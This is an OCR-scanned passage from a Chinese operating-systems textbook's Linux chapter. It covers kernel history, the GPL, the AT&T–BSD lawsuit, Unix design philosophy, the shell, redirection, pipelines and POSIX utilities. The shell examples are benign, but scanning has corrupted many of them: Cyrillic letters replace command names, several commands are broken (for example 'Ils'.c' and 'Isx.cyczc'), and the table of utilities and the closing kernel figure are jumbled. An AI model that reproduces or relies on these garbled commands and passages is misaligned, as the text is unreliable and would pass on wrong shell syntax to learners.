类 型 的 机 器 上 。 尽 管 如 此 ，Linux 和 UNIX 之 间 还 是 有 一 个 很 明显 的 不 同 : Linux 利 用 了 gcc 编 译 器 的 很 多 
特性 ， 需 要 做 大 量 的 工作 ， 才 能 使 Linux 能 够 被 ANSI 标 准 C 编 译 器 编译 。 

接 下 来 的 一 个 主要 的 Linux 发 行 版 是 1994 年 发 布 的 版 本 1.0。 它 大 概 有 165 000 行 代码 ， 并 且 包 含 了 一 
个 新 的 文件 系统 、 内 存 映射 文件 和 可 以 与 BSD 相 容 的 带 有 套 接 字 和 TCP/IP 的 网 络 。 它 同时 也 包含 了 一 些 
新 的 驱动 程序 。 在 接 下 来 的 两 年 中 ， 发 布 了 几 个 轻微 修订 版 本 。 

到 这 个 时 候 ，Linux 已 经 和 UNIX 充 分 兼容 ， 大 量 的 UNIX 软 件 都 被 移植 到 了 Linux 上 ， 使 得 它 比 起 以 
前 具有 了 更 强 的 可 用 性 。 另 外 ， 大 量 的 用 户 被 Linux 所 吸引 ， 并 且 在 Torvalds 的 整体 管理 下 开始 用 多 种 方 
法 对 Linux 的 代码 进行 研究 和 扩展 。 

之 后 一 个 主要 的 发 行 版 ， 是 1996 年 发 布 的 2.0 版 本 。 它 由 大 约 470 000 行 C 代 码 和 8000 行 汇编 代码 组 
成 。 它 包含 了 对 64 位 体系 结构 的 支持 、 对 称 多 道 程序 设计 、 新 的 网 络 协议 和 许多 的 其 他 特性 。 一 个 可 扩 
展 设 备 驱 动 程序 集 占用 了 总 代码 量 的 很 大 一 部 分 。 随 后 ， 很 快 发 行 了 另外 的 版 本 。 

Linux 内 核 的 版 本 号 由 四 个 数字 组 成 ，A.B.C.D， 如 2.6.9.11。 第 一 个 数字 表示 内 核 的 版 本 。 第 二 个 
数字 表示 第 几 个 主要 修订 版 。 在 2.6 版 本 内 核 之 前 ， 偶 数 版 本 号 相当 于 内 核 的 稳定 发 行 版 ， 而 奇数 版 本 
号 则 相当 于 不 稳定 的 修订 版 ， 即 开发 版 。 在 2.6 版 本 内 核 中 ， 不 再 是 这 种 情况 了 。 第 三 个 数字 表示 次 要 
修订 版 ， 比 如 支持 了 新 的 驱动 程序 等 。 第 四 个 数字 则 与 小 的 错误 修正 或 安全 补丁 相关 。 

大 量 的 标准 UNIX 软 件 移植 到 了 Linux 上 ， 包 括 X 窗 口 系统 和 大 量 的 网 络 软件 。 也 有 人 为 Linux 开 发 
了 两 个 不 同 的 GUI (GNOME 和 KDE)。 简 而 言 之 ，Linux 已 经 成 长 为 一 个 完整 的 UNIX 翻 版 ， 包 括 了 
UNIX 爱 好 者 想 要 的 所 有 特性 。 

Linux 的 一 个 独特 的 特征 是 它 的 商业 模式 : 它 是 自由 软件 。 它 可 以 从 互联 网 上 的 很 多 站 点 中 下 载 到 ， 
比如 : www.kernel.org。Linux 带 有 一 个 由 自由 软件 基金 会 (FSF) 的 创建 者 Richard Stallman 设 计 的 许可 。 
尽管 Linux 是 自由 的 ， 但 是 它 的 这 个 许可 GPL (GNU 公 共 许 可 )， 比 微软 Windows 的 许可 更 长 ， 并 且 规 定 
了 用 户 能 够 使 用 代码 做 什么 以 及 不 能 做 什么 。 用 户 可 以 自由 地 使 用 、 复 制 、 修 改 以 及 传播 源 代码 和 二 进 
制 代码 。 主 要 的 限制 是 以 Linux 内 核 为 基础 开发 的 产品 不 能 只 以 二 进 制 形式 (可 执行 文件 ) 出 售 或 分 
发 ， 其 源 代 码 必须 要 么 与 产品 一 起 发 送 ， 要么 可 以 随意 索取 。 

虽然 Torvalds 仍 然 相 当 紧密 地 控制 着 Linux 的 内 核 ， 但 是 Linux 的 大 量 用 户 级 程序 是 由 其 他 程序 员 编 
写 的 。 他 们 中 的 很 多 人 一 开始 是 从 MINIX、BSD 或 GNU 在 线 社区 转移 过 来 的 。 然 而 ， 随 着 Linux 的 发 展 ， 
越 来 越 少 的 Linux 社 区 成 员 想 要 破译 源 代 码 (有 上 百 本 介绍 怎样 安装 和 使 用 Linux 的 书 ， 然 而 只 有 少数 书 
介绍 源 代码 以 及 其 工作 机 理 )。 同 时 ， 很 多 Linux 用 户 放弃 了 互联 网 上 免费 分 发 的 版 本 ， 转 而 购买 众多 竞 
争 商业 公司 提供 的 CD-ROM 版 本 。 在 一 个 流行 站 点 www.distrowatch.org 上 列 出 了 现在 最 流行 的 100 种 
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Linux 版 本 。 随 着 越 来 越 多 的 软件 公司 开始 销售 自制 版 本 的 Linux ， 而 且 越 来 越 多 的 硬件 公司 承诺 在 他 们 
出 售 的 计算 机 上 预 装 Linux ， 自 由 软件 与 商业 软件 之 间 的 界限 变 得 愈 发 模糊 了 。 

作为 Linux 故 事 的 一 个 有 趣 的 脚注 ， 我 们 注意 到 在 Linux 变 得 越 来 越 流行 时 ， 它 从 一 个 意 想不到 的 源 
Ж (AT&T) 获得 了 很 大 的 推动 。1992 年 ， 由 于 缺乏 资金 ，Berkeley 决 定 在 推出 BSD 的 最 终 版 本 4.4BSD 
后 停止 开发 (4.4BSD 后 来 成 为 FreeBSD 的 基础 )。 由 于 这 个 版 本 几乎 不 包含 AT&T 的 代码 ，Berkeley 决 定 
将 这 个 软件 的 开源 许可 证 (不 是 GPL) 发 布 ， 任 何人 可 以 对 它 做 任何 想 做 的 事情 ， 只 要 不 对 加 州 大 学 提 
出 诉讼 。AT&T 负 责 UNIX 的 子 公司 做 出 了 迅速 的 反应 一 一 正如 你 猜 的 那样 一 一 它 提出 了 对 加 州 大 学 的 诉 
讼 。 同 时 ， 它 也 控告 了 BSDI， 一 家 由 BSD 开 发 者 创立 、 包 装 系统 并 出 售 服务 的 公司 〈 正 像 Red Hat 以 及 
其 他 公司 现在 为 Linux 所 做 的 那样 ) 。 由 于 4.4BSD 中 事实 上 不 含有 AT&T 的 代码 ， 起 诉 是 依据 版 权 和 商标 
侵犯 包括 BSDI 的 1-800-ITS-UNIX 那 样 的 电话 号 码 。 虽 然 这 次 诉讼 最 终 在 庭 外 和 解 ， 它 把 FreeBSD 隔 
离 在 市 场 之 外 ， 却 给 了 Linux 足 够 的 时 间 发 展 半 大。 如果 这 次 诉讼 没有 发 生 ， 从 1993 年 起 两 个 免费 、 开 
源 的 UNIX 系 统 之 间 就 会 进行 激烈 的 竞争 ， 由 处 于 统治 地 位 的 、 成 熟 稳定 且 自 1977 年 起 就 在 学 界 得 到 巨 
大 支持 的 系统 BSD 应 对 富有 活力 的 年 轻 挑战 者 、 只 有 两 年 历史 却 在 个 人 用 户 中 支持 率 稳步 增长 的 Linux。 
谁 知 道 这 场 免费 UNICES 的 战争 会 变 成 何 种 局 面 ? 
10.2 Linux 概 述 

为 了 那些 对 Linux 不 熟悉 的 用 户 的 利益 ， 在 这 一 节 我 们 将 对 Linux 本 身 以 及 如 何 使 用 Linux 进 行 简单 
的 介绍 。 几 乎 本 节 介 绍 的 所 有 内 容 同样 适用 于 所 有 与 UNIX 相 差不多 的 UNIX 衍 生 系统 。 虽然 Linux 有 多 
个 图 形 界面 ， 但 在 这 里 我 们 关注 的 是 在 X 系 统 的 shell 窗 口中 工作 的 程序 员 眼 中 的 Linux 界 面 。 在 随后 的 儿 
节 中 ， 我 们 将 关注 系统 调用 以 及 它们 是 如 何在 内 核 中 工作 的 。 


10.2.1 Linux 的 设计 目标 

一 直 以 来 ，UNIX 都 被 设计 成 一 种 能 够 同时 处 理 多 进程 和 多 用 户 的 交互 式 系统 。 它 是 由 程序 员 设计 
的 ， 也 是 给 程序 员 使 用 的 ， 而 使 用 它 的 用 户 大 多 都 比较 有 经 验 并 且 经 常 参与 (通常 较为 复杂 的 ) 软件 开 
发 项 目 。 在 很 多 情况 下 ， 通 常 是 大 量 的 程序 员 通过 积极 的 合作 来 开发 一 个 单一 的 系统 ， 因此 UNIX 有 广 
泛 的 工具 来 支持 在 可 控制 的 条 件 下 的 多 人 合作 和 信息 共享 。 一 组 有 经 验 的 程序 员 共 同 开发 一 个 复杂 软件 
的 模式 显然 和 一 个 初学 者 独立 地 使 用 一 个 文档 编辑 器 的 个 人 计算 机 模式 有 显著 区 别 ， 而 这 种 区 别 在 
UNIX 系 统 中 自始至终 都 有 所 反映 。Linux 系 统 自然 而 然 地 继承 了 这 些 设计 目标 ， 尽管 它 的 第 一 个 版 本 是 
面向 个 人 电脑 的 。 

好 的 程序 员 追 求 什么 样 的 系统 ? 首先 ,大 多 数 程序 员 喜 欢 让 系统 尽量 简单 ,优雅 ,并 且 具 有 一 致 性 。 
比如 ， 从 最 底层 的 角度 来 讲 ， 一 个 文件 应 该 只 是 一 个 字 节 集合 。 为 了 实现 顺序 存 取 、 随 机 存 取 、 按键 存 
取 、 远 程 存 取 等 而 设计 不 同类 型 的 文件 〈 像 大 型 机 一 样 ) 只 会 碍 事 。 类 似 地 ， 如 果 命 令 

БА" 

的 意思 是 列举 出 所 有 以 “A” 打 头 的 文件 ， 那 么 命令 

тА" 

的 意思 就 应 该 是 删除 所 有 以 “A” 打 头 的 文件 而 不 是 删除 文件 名 是 “A*” 的 那个 文件 。 这 个 特性 有 时 被 
称 为 最 小 惊讶 原理 。 

有 经 验 的 程序 员 通常 还 希望 系统 具有 较 强 的 功能 性 和 灵活 性 。 这 意味 着 一 个 系统 应 该 具有 较 小 的 一 
组 基本 元 素 ， 而 这 些 元 素 可 有 多 种 多 样 的 组 合 方式 来 满足 各 种 应 用 需要 。 设计 Linux 的 一 个 基本 指导 方 
针 就 是 每 个 程序 应 该 只 做 一 件 事 并 且 把 它 做 好 。 因 此 ， 编 译 器 不 会 产生 列表 ， 因为 有 其 他 的 程序 可 以 更 
好 地 实现 这 个 功能 。 

最 后 ， 大 多 数 程序 员 非 常 反感 没 用 的 元 余 。 如 果 cp 可 以 胜任 ， 那么 为 什么 还 需要 copy? 为 了 从 文件 
f 中 提取 所 有 包含 字符 串 “ard” 的 行 ，Linux 程 序 员 输 入 

grep ard f 
另外 一 种 方法 是 让 程序 员 先 选择 grep 程 序 (不 带 参数 ) ， 然 后 让 grep 程 序 自己 宣布 说 “你 好 ， 我 是 grep， 
我 在 文件 中 寻找 模式 。 请 输入 你 要 寻找 的 模式 .” 在 输入 一 个 模式 之 后 ， grep 程 序 要 求 输入 一 个 文件 名 。 
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然后 它 再 提问 是 否 还 有 别 的 文件 。 最 后 ， 它 总 结 需 要 执行 的 任务 并 且 询问 是 否 正确 。 尽 管 这 样 的 用 户 界 
面 可 能 适合 初学 者 ， 但 它 会 把 有 经 验 的 程序 员 逼 疯 。 他 们 想 要 的 是 一 个 佣 人 ， 不 是 一 个 保姆 。 
10.2.2 到 Linux 的 接口 4 

一 个 Linux 系 统 可 被 看 成 一 座 金字 塔 ， 如 图 10-1 所 示 。 最 底层 的 是 硬件 ， 包 括 CPU、 内 存 、 磁 盘 、 
显示 器 、 键 盘 以 及 其 他 设备 。 运 行 在 硬件 之 上 的 是 操作 系统 。 它 的 作用 是 控制 硬件 并 且 为 其 他 程序 提供 
系统 调用 接口 。 这 些 系统 调用 允许 用 户 程序 创立 并 管理 进程 、 文 件 以 及 其 他 资源 。 


用 户 接口 
| 用 户 
EAK 


вп 标准 实用 程序 | 
| | се. зва. йаз) 
系统 调用 用 户 态 
ёп 标准 库 函数 
{ (open、close、read、write、fork 等 ) | 


Linux 操 作 系统 ar 态 
(进程 管理 、 存 储 管理 、 文 件 系 统 、VO 等 ) 人 


硬件 
(CPU、 内 存 、 磁 盘 、 终 端 等 ) 


10-1 Linux 系 统 中 的 层次 结构 


程序 通过 把 参数 放 入 寄存 器 (有 了 时 是 栈 ) 来 调用 系统 调用 ， 并 发 出 陷阱 指令 从 用 户 模式 切换 到 内 核 
模式 。 由 于 不 能 用 C 语 言 写 一 条 陷阱 指令 ， 因 此 系统 提供 了 一 个 库 ， 每 个 函数 对 应 一 个 系统 调用 。 这 些 
函数 是 用 汇编 语言 写 的 ， 不 过 可 以 从 C 中 调用 。 每 一 个 函数 首先 将 参数 放 到 合适 的 地 方 ， 然 后 执行 陷阱 
命令 。 因 此 ， 为 了 执行 read 系 统 调用 ， 一 个 C 程 序 需要 调用 read 库 函数 。 值得 一 提 的 是 ， 由 POSIX 指 定 
的 是 库 接口 ， 而 不 是 系统 调用 接口 。 换 名 话说， POSIX 规 定 哪些 库 函 数 是 一 个 符合 标准 规范 的 系统 必须 
提供 的 ， 它 们 的 参数 是 什么 ， 它 们 的 功能 是 什么 ， 以 及 它们 返回 什么 样 的 结果 。 POSIX 根 本 没有 提 到 真 
正 的 系统 调用 。 

除了 操作 系统 和 系统 调用 库 ， 所 有 版 本 的 Linux 必 须 提供 大 量 的 标准 程序 ， 其 中 一 些 是 由 POSIX 
1003.2 标 准 指定 的 ， 其 他 的 根据 不 同 版 本 的 Linux 而 有 所 不 同 。 它 们 包括 命令 处 理 器 (shell) 、 编 译 器 、 
编辑 器 、 文 本 处 理 程序 以 及 文件 操作 工具 。 用 户 使 用 键盘 调用 的 是 上 述 这 些 程序 。 因 此 ， 我 们 可 以 说 
Linux 具 有 三 种 不 同 的 接口 : 真正 的 系统 调用 接口 、 库 函 数 接口 和 由 标准 应 用 程序 构成 的 接口 。 

大 多 数 的 Linux 个 人 计算 机 发 行 版 都 把 上 述 的 面向 键盘 的 用 户 界面 替换 为 面向 鼠标 的 图 形 用 户 界面 ， 
而 根本 没有 修改 操作 系统 本 身 。 正 是 这 种 灵活 性 让 Linux 如 此 流行 并 且 在 经 历 了 如 此 多 的 技术 革新 后 存 
ТЖ, 

Linux 的 GUI 和 最 初 在 20 世 纪 70 年 代为 UNIX 系 统 开发 的 、 后 来 由 于 Macintosh 和 Windows 变 得 流行 的 
GUI 非常 相似 。 这 种 GUI 创建 一 个 桌面 环境 ， 包 括 窗口 、 图 标 、 文 件 夹 、 工具 栏 和 拖 搜 功 能 。 一 个 完整 的 
桌面 环境 包含 一 个 窗口 管理 器 (负责 控制 窗口 的 摆 放 和 外 观 ) ， 以 及 各 种 应 用 程序 ， 并 且 提供 一 个 一 致 的 
图 形 界面 。 比 较 流行 的 Linux 桌 面 环境 包括 GNOME (GNU 网 络 对 象 模型 环境 ) 和 KDE (K 桌 面 环境 ) 。 

Linux 上 的 GUI 由 X 窗 口 系统 (常常 称 为 X11 或 者 X) 所 支持 ， 它 负 责 定义 用 于 UNIX 和 类 UNIX 系 统 
中 基于 位 图 显示 的 操作 窗口 的 通信 和 显示 协议 。 其 主要 组 成 部 分 X 服 务 器 ， 控 制 键盘 ， 鼠标 、 显 示 器 等 
设备 ， 并 负责 和 输入 重 定向 或 者 从 客户 程序 接受 输出 。 实 际 的 GUIT 环 境 通常 构建 在 一 个 包含 与 X 服 务 器 进 
行 交互 功能 的 低层 库 xlib 上 。 图 形 界 面 将 X11 的 基本 功能 进行 拓展 ， 丰 富 了 窗口 的 显示 ， 提供 按钮 、 菜 
单 、 图 标 以 及 其 他 选项 。X 服 务 器 可 以 通过 命令 行 手动 启动 ， 不 过 通常 在 启动 过 程 中 由 -个 负责 显示 用 
户 登录 图 形 界面 的 显示 管理 器 启动 。 

当 在 Linux 上 使 用 图 形 界面 时 ， 用 户 可 以 通过 鼠标 点 击 运行 程序 或 者 打开 文件 ， 通 过 拖拉 将 文件 从 
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一 个 地 方 复制 到 另 一 个 地 方 等 。 另外， 用 户 也 可 以 启动 一 个 终端 模拟 程序 xterm， 它 为 用 户 提供 一 个 到 
操作 系统 的 基本 命令 行 界面 。 下 面 一 节 有 关于 它 的 详细 描述 。 
10.2.3 shell 

尽管 Linux 系 统 具 有 图 形 用 户 界面 ， 然 而 大 多 数 程序 员 和 高 级 用 户 都 更 愿意 使 用 一 个 命令 行 界面 ， 
称 作 shell。 通 常 这 些 用 户 在 图 形 用 户 界面 中 启动 一 个 或 更 多 的 shell 窗 口 ， 然 后 就 在 这 些 shell 窗 口中 工作 。 
shell 命 令 行 界面 使 用 起 来 更 快速 ， 功 能 更 强大 ， 扩 展 性 更 好 ， 并 且 让 用 户 不 会 遭受 由 于 必须 一 直 使 用 也 
标 而 引起 的 肢体 重复 性 劳损 (RSI) 。 接 下 来 我 们 简要 介绍 一 下 bash shell (bash)。 它 是 基于 UNIX 最 原 
始 的 shell (Bourne shell) 的 ， 而 且 实际 上 它 的 名 字 也 是 Bourne Again shell 的 首 字母 缩写 。 经 常 使 用 的 还 
有 很 多 其 他 的 shell (ksh，csh 等 )， 但 是 bash 是 大 多 数 Linux 系 统 的 默认 shell。 

当 shell 被 启动 时 ， 它 初始 化 自己 ， 然 后 在 屏幕 上 输出 一 个 提示 符 (prompt) ， 通 常 是 一 个 百 分 号 或 
者 美元 符号 ， 并 等 待 用 户 输入 命令 行 。 

等 用 户 输 入 一 个 命令 行 后 ，shell 提 取 其 中 的 第 一 个 字 ， 假 定 这 个 字 是 将 要 运行 程序 的 程序 名 ， 搜 索 
这 个 程序 ， 如 果 找到 了 这 个 程序 就 运行 它 。 然 后 ，shell 会 将 自己 挂 起 直到 该 程序 运行 完毕 ， 之 后 再 尝试 
读 和 人 下 一 条 命令 。 重 要 的 是 ，shell 也 只 是 一 个 普通 用 户 程序 。 它 仅仅 需要 从 键盘 读 取 数据 、 向 显示 器 输 
出 数据 和 运行 其 他 程序 的 能 力 。 

命令 中 还 可 以 包含 参数 ， 它 们 作为 字符 串 传 给 所 调用 的 程序 。 比 如 ， 下 面 的 命令 行 

cp src дез! 
调用 cp 程序 并 包含 两 个 参数 ，src 和 dest。 这 个 程序 将 第 一 个 参数 解释 为 一 个 现存 的 文件 名 ， 然 后 创建 访 
文件 的 一 个 副本 ， 其 名 称 为 dest。 

并 不 是 所 有 的 参数 都 是 文件 名 。 在 命令 行 

head -20 ће 
中 ， 第 一 个 参数 -20 通 知 head 程 序 输出 file 中 的 前 20 行 ， 而 不 是 默认 的 10 行 。 负责 控制 一 个 命令 的 操作 或 
者 指定 一 个 可 选 数值 的 参数 称 为 标志 (flag) ， 习 惯 上 由 一 个 破 折 号 标记 。 为 了 避免 歧义 ， 这 个 破 折 号 是 
必要 的 ， 比 如 

head 20 file 
是 一 个 完全 合法 的 命令 ， 它 告诉 head 程 序 输出 文件 名 为 20 的 文件 的 前 10 行 ， 然后 输出 文件 名 为 file 的 文 
件 的 前 10 行 。 大 多 数 Linux 命 令 接 受 多 个 标志 和 多 个 参数 。 

为 了 更 容易 地 指定 多 个 文件 名 ，shell 支 持 度 法 字符 ， 有 时 称 为 通配符 。 比 如 ， 一 个 星 号 可 以 匹配 所 
有 可 能 的 字符 串 ， 因 此 

Ils".c 
告诉 Is 列举 出 所 有 文件 名 以 .结束 的 文件 。 如 果 同 时 存在 文件 x.c，y.c，z.c， 那么 上 述 命令 等 价 于 下 面 的 
命令 

Isx.cyczc 
另 一 个 通配符 是 问号 ,负责 匹配 任意 一 个 字符 。 一 组 在 中 括号 中 的 字符 可 以 表示 其 中 的 任意 一 个 因此 

ls [ape]* 
列举 出 所 有 以 “a”"，“p” 或 者 “e” 开 头 的 文件 。 

像 shell 这 样 的 程序 不 一 定 非 要 通过 终端 (键盘 和 显示 器 ) 进行 输入 输出 。 当 它 (或 者 任何 其 他 程序 ) 
启动 时 ， 它 自动 获得 了 对 标准 输入 【负责 正常 输入 ) ， 标 准 输出 (负责 正常 输出 ) 和 标准 错误 (负责 输 
出 错误 信息 ) 文件 进行 访问 的 能 力 。 正 常情 况 下 ， 上 述 三 个 文件 默认 地 都 指向 终端 ， 因 此 标准 的 输出 是 
从 键盘 输入 的 ， 而 标准 输出 或 者 标准 错误 是 输出 到 显示 器 的 。 许多 Linux 程 序 默 认 从 标准 输入 进行 输入 
并 从 标准 输出 进行 输出 。 比 如 


sort 


调用 sort 程 序 ， 其 从 终端 读 取 数 据 (直到 用 户 输入 Ctrl-D 表 示 文件 结束 ) ， 根 据 字母 顺序 将 它们 排序 ， 然 
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后 将 结果 输出 到 屏幕 上 。 

也 可 以 对 标准 输入 和 输出 进行 重 定位 ， 因 为 这 种 情况 通常 会 很 有 用 。 对 标准 输入 进行 重 定位 的 语法 
使 用 一 个 小 于 号 (<) 加 上 紧 接 的 一 个 输入 文件 名 。 类 似 的 ， 标 准 输出 可 以 通过 一 个 大 于 号 (>) 进行 重 
定位 。 允 许 在 一 个 命令 中 对 两 者 同时 进行 重 定位 。 比 如 ， 下 面 的 命令 ; 

sort <in >out 
使 得 sort 从 文件 in 中 得 到 输入 ， 并 把 结果 输出 到 文件 out 中 。 由 于 标准 错误 没有 被 重 定位 ， 因 此 所 有 的 错 
误 信息 会 输出 到 屏幕 中 。 一 个 从 标准 输入 中 读 取 数据 ， 对 数据 进行 某 种 处 理 ， 然 后 输出 到 标准 输出 的 程 
序 称 为 过 滤器 filter)。 

考虑 下 面 一 条 包括 三 条 独立 命令 的 命令 行 : 

sort <in >temp; head -30 <temp; rm temp 
首先 它 运行 sort， 从 in 得 到 输入 然后 将 结果 输出 到 temp 中 。 完 成 后 ，shell 运 行 head ， 令 其 将 temp 的 前 30 
行内 容 输出 到 标准 输出 中 ， 默 认为 终端 。 最 后 ， 临 时 文件 temp 被 删除 。 

常常 有 把 命令 行 中 第 一 个 程序 的 输出 作为 下 一 个 程序 的 输入 这 种 情况 。 在 上 面 的 例子 中 ， 我 们 使 用 
temp 文 件 来 保存 这 个 输出 。 然 而 ， Linux 提 供 了 一 种 更 简单 的 方法 来 达到 相同 的 结果 。 在 命令 行 

sort <in | пеаа -30 
中 ， 竖 杠 ， 也 常 被 称 为 管道 符 (pipe symbol), 告诉 程序 从 sort 中 得 到 输出 并 且 将 其 作为 输入 传 给 head， 
由 此 消除 了 创建 、 使 用 和 删除 一 个 临时 文件 的 过 程 。 由 管道 符 连接 起 来 的 命令 ， 称 为 一 个 管线 
(pipeline) ， 可 以 包含 任意 多 的 命令 。 一 个 由 四 个 部 分 组 成 的 管线 如 下 所 示 ， 

grep (ег *.t | sort | head -20 | tail -5 >foo 
这 里 所 有 以 .! 结 尾 的 文件 中 包含 “ter” 的 行 被 写 到 标准 输出 中 ， 然后 被 排序 。 这 些 内 容 的 前 20 行 被 head 
选择 出 来 并 传 给 tail， 它 又 将 最 后 5 行 (也 即 排 完 序 的 列表 中 的 第 16 到 20 行 ) 传 给 foo。 这 个 例子 显示 了 
Linux 是 如 何 提供 了 一 组 各 负责 一 项 任务 的 基本 单元 (一 些 过 滤器 ) 和 一 个 几乎 可 以 用 无 穷 的 方式 把 它 
们 组 合 起 来 的 机 制 。 

Linux 是 一 种 通用 多 道 程序 设计 系统 。 一 个 用 户 可 以 同时 运行 多 个 程序 ， 每 一 个 作为 一 个 独立 的 进 
程 存在 。 在 shell 中 ， 后 台 运行 一 个 程序 的 语法 是 在 原本 命令 后 加 一 个 “&"。 因 此 ， 

мс -I <a >b & 
运行 字数 统计 程序 we， 来 统计 输入 文件 a 中 的 行 数 〈-1 标 志 ) ， 并 将 结果 输出 到 b 中 ， 不 过 整个 过 程 都 在 
后 台 运行 。 命 令 一 被 输入 ， shell 输 出 提示 符 就 可 以 接收 并 处 理 下 一 条 命令 。 管线 也 可 以 在 后 台中 运行 ， 
比如 下 面 的 指令 : 

sort <x | head & 

多 个 管线 也 可 以 同时 在 后 台中 运行 。 

可 以 把 一 系列 shell 命 令 放 到 一 个 文件 中 ， 然后 将 此 文件 作为 shell 的 输入 来 运行 。 第 二 个 shell 按 照 顺 
序 处 理 这 些 命令 ， 和 处 理 从 键盘 输入 的 命令 一 样 。 包含 shell 命 令 的 文件 称 为 shell 脚 本 。shell 脚 本 可 以 给 
shell 的 变量 赋值 ， 然 后 过 一 段 时 间 再 读 取 这 些 变量 。shell 脚 本 也 可 以 包含 参数 ， 同时 使 用 f、for、while 
和 case 等 结构 。 因 此 ， 一 个 shell 脚 本 实际 上 是 一 个 由 shell 语 言 编写 的 程序 。 Berkeley С shell 是 另 一 种 
shell， 它 的 设计 目标 是 使 得 shell 脚 本 (以 及 一 般 意义 上 的 命令 语言 ) 在 很 多 方面 看 上 去 和 C 程 序 相似 。 
由 于 shell 也 只 是 一 个 用 户 程序 ， 其 他 人 也 设计 并 发 行 过 很 多 不 同 的 shell。 


10.2.4 Linux 应 用 程序 
Linux 的 命令 行 (shell) 用 户 界面 包含 大 量 的 标准 应 用 程序 。 这 些 程序 可 以 大 致 分 成 以 下 6 类 : 
D 文件 和 目录 操作 命令 。 
2) 过 滤器 。 
3) 程序 设计 工具 ， 如 编辑 器 和 编译 器 。 
4) 文档 处 理 。 
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5) 系统 管理 。 

в) 其 他 。 
POSIX 1003.2 标 准 规定 了 100 种 左右 关于 上 述 程序 的 语法 和 语义 ， 主 要 是 前 三 类 中 的 程序 。 让 这 些 程序 
具有 统一 的 标准 主要 是 为 了 实现 让 任何 人 写 的 shell 脚 本 可 以 在 任何 Linux 系 统 上 运行 。 

除了 这 些 标准 应 用 程序 外 ， 当 然 还 有 许多 其 他 应 用 程序 ， 比 如 Web 浏 览 器 ， 图 片 浏览 器 等 。 

下 面 我 们 看 一 看 一 些 程序 的 例子 ， 首 先 从 文件 和 目录 操作 开始 。 

cpab 


将 文件 a 移 动 到 b， 而 不 改变 原文 件 。 相 比 之 下 ， 
mvab 
将 文件 a 移 动 到 b 但 是 删除 原文 件 。 从 效果 上 来 看 ， 它 是 文件 移动 而 不 是 通常 意义 上 的 复制 。cat 命 令 可 以 
把 多 个 文件 的 内 容 连接 起 来 ， 它 读 人 每 一 个 输入 文件 然后 把 它们 按 师 序 复制 到 标准 输出 中 。 可 以 通过 rm 
命令 来 删除 文件 。 命 令 chmod 可 以 让 属 主 通过 修改 文件 的 权限 位 来 改变 其 访问 权限 。 使 用 mkdir 和 rmdir 
命令 可 以 分 别 实现 目录 的 创建 和 删除 。 为 了 列 出 一 个 目录 下 的 文件 ， 可 以 使 用 ls 命令 。 它 包含 大 量 的 标 
志 来 控制 要 显示 文件 的 哪些 特征 (如 大 小 、 用 户 、 群 、 创 建 日 期 )、 决 定 文件 的 显示 顺序 (如 字母 序 、 
修改 日 期 、 逆 序 ) 、 指 定 文件 输出 格式 等 。 
我 们 已 经 见 到 了 很 多 过 滤器 :grep 从 标准 输入 或 者 一 个 或 多 个 输入 文件 中 提取 包含 特定 模式 的 行 ， 
Sort 将 输入 进行 排序 并 输出 到 标准 输出 ，head 提 取 输 入 的 前 几 行 ，tail 提 取 输 入 的 后 几 行 。 其 他 的 由 
1003.2 定 义 的 过 滤器 有 cut 和 paste， 它 们 实现 一 


段 文档 的 葛 切 和 粘贴 ，od 将 输入 (通常 是 二 进 制 ) EA 典型 应 用 
转换 成 ASCII 文 档 ， 包 括 八进制 十进制 或 者 十 |- 将 多 个 文件 连接 到 标准 输出 
六 进 制 ， 实现 字符 大 小 写 转换 (如 小 写 换 大 写 ) ， Har eketa 
Pr 为 打印 机 格式 化 输出 ， 包 括 一 些 格式 选项 各。 [cur ТРЫ ЕТУ 
运行 头 ， 页 码 等 。 grep 在 文件 中 检索 给 定 模式 
编译 器 和 程序 设计 工具 包括 gee ( 它 调用 C 语 言 head 提取 文件 的 前 几 行 
编译 器 ) 以 及 ar ( 它 将 库 函 数 收集 到 存档 文件 中 )。 四 列 出 日 录 
另外 一 个 重要 的 工具 是 make， 它 负责 维护 大 | make | 编译 文件 生成 二 进 制 文件 
的 程序 ， 这 些 程序 的 源码 通常 分 布 在 多 个 文件 中 。 | mkdir | 创建 目录 
通常 ， 其 中 一 些 文件 是 头 文件 (headerfile)， 其 中 |24 以 八进制 年 示 一 个 文件 
包括 类 型 、 变 量 、 宏 和 其 他 声明 。 源 文件 通常 使 《| -Paste | 将 一 段 文字 粘贴 到 一 个 文件 中 
用 include 将 头 文件 包含 进来 。 这 样 ， 两 个 或 更 多 H Amati 
的 源 文 件 可 以 共享 同样 的 声明 。 然 而 ， 如 果 头 文 r 删除 一 个 或 多 个 文件 
件 被 修改 ， 就 需要 找到 所 有 依赖 于 这 个 头 文件 的 [тат | 删除 一 个 目录 
源 文件 并 对 它们 重新 进行 编译 。make 的 作用 是 跟 [sot ”| 对 文件 中 的 所 有 行 撤 晴 字 豆 序 进 行 排序 
踪 哪 些 文件 依赖 于 哪些 头 文件 等 ， 然 后 安排 所 有 [ai 提取 文件 的 最 后 几 行 
需要 进行 的 编 详 自动 进行 。 几 乎 所 有 的 Linux 程 序 ， | 在 字符 集 之 间 转换 


除了 最 小 的 那些 ， 都 是 依靠 make 进 行 编译 的 。 
一 部 分 POSIX 标 准 应 用 程序 列 在 图 10-2 中 ， 


10.2.5 内 核 结 构 


图 10-2 POSIX 定 义 的 一 些 常见 的 Linux 应 用 程序 
包括 每 个 程序 的 简要 说 明 。 所 有 Linux 系 统 中 都 有 这 些 程序 以 及 许多 其 他 标准 的 应 用 程序 。 


在 图 10-1 中 我 们 看 到 了 Linux 系 统 的 总 体 结构 。 在 进一步 研究 内 核 的 组 成 部 分 ， 如 进程 调度 和 文件 
系统 之 前 ， 我 们 先 从 整体 的 角度 看 一 下 Linux 的 内 核 。 

内 核 坐 落 在 硬件 之 上 ， 负 责 实 现 与 /0 设备 和 存储 管理 单元 的 交互 ， 并 控制 CPU 对 前 述 设备 的 访问 。 
如 图 10-3 所 示 ， 在 最 底层 ， 内 核 包含 中 断 处 理 程序 ， 它 们 是 与 设备 交互 的 主要 方式 ， 以 及 底层 的 分 派 机 
制 。 这 种 分 派 在 中 断 时 发 生 。 底 层 的 代码 中 止 正在 运行 的 进程 ， 将 其 状态 存储 在 内 核 进程 结构 中 ， 然 后 
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启动 相应 的 驱动 程序 。 进 程 分 派 也 在 内 核 完成 某 些 操作 ， 并 且 需 要 再 次 启动 一 个 用 户 进程 时 发 生 。 进 程 
分 派 的 代码 是 汇编 代码 ， 并 且 和 进程 调度 代码 有 很 大 不 同 。 


理 部 件 


“чы \ 
т) | 信号 处 理 | 


套 接 字 文件 系统 


